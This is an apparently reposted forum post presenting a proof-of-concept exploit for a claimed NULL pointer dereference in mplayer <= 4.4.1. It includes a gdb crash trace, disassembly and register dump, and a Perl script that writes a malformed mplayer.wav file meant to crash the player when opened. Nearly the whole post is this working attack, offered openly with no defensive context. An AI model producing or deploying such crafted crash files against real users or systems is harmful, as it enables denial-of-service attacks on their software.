ANdreicj Posted March 19, 2010 Report Posted March 19, 2010 # Exploit Title: mplayer <= 4.4.1 NULL pointer dereference exploit poc 0 day# Date: 17/03/2010# Author: Pietro Oliva# Software Link: # Version: <= 4.4.1# Tested on: ubuntu 9.10 but should work in windows too# CVE : #Program received signal SIGSEGV, Segmentation fault.#0x081176d8 in af_calc_filter_multiplier ()#(gdb) disas af_calc_filter_multiplier #Dump of assembler code for function af_calc_filter_multiplier:#0x081176d0 <af_calc_filter_multiplier+0>: push %ebp#0x081176d1 <af_calc_filter_multiplier+1>: mov %esp,%ebp#0x081176d3 <af_calc_filter_multiplier+3>: fld1 #0x081176d5 <af_calc_filter_multiplier+5>: mov 0x8(%ebp),%eax#0x081176d8 <af_calc_filter_multiplier+8>: mov (%eax),%eax ==> mplayer tries to dereference eax, which is a NULL pointer!!! #0x081176da <af_calc_filter_multiplier+10>: lea 0x0(%esi),%esi#0x081176e0 <af_calc_filter_multiplier+16>: fmull 0x28(%eax)#0x081176e3 <af_calc_filter_multiplier+19>: mov 0x18(%eax),%eax#0x081176e6 <af_calc_filter_multiplier+22>: test %eax,%eax#0x081176e8 <af_calc_filter_multiplier+24>: jne 0x81176e0 <af_calc_filter_multiplier+16>#0x081176ea <af_calc_filter_multiplier+26>: pop %ebp#0x081176eb <af_calc_filter_multiplier+27>: ret #End of assembler dump.# REGISTERS:#eax 0x0 0 ==========> NULL#ecx 0xfa157a57 -99255721#edx 0x1fe0 8160#ebx 0x8509a08 139500040#esp 0xbfffe2e8 0xbfffe2e8#ebp 0xbfffe2e8 0xbfffe2e8#esi 0x7b84000 129515520#edi 0xf8000 1015808#eip 0x81176d8 0x81176d8 <af_calc_filter_multiplier+8>#eflags 0x10216 [ PF AF IF RF ]#cs 0x73 115#ss 0x7b 123#ds 0x7b 123#es 0x7b 123#fs 0x0 0#gs 0x33 51#!/usr/bin/perlprint "[+] mplayer <= 4.4.1 NULL pointer dereference exploit poc 0 day by Pietro Oliva\n";print "[+] pietroliva[at]gmail[dot]com http://olivapietro.altervista.org\n";print "[+] creating crafted file mplayer.wav\n";$buffer="\x52\x49\x46\x46\x1f\x04\x00\x00\x57\x41\x56\x45\x66\x6d\x74\x20\x10\x00\x00\x00\x01\x00\x1f";open(file,"> mplayer.wav");print(file $buffer);print "[+] done!\n"; Quote
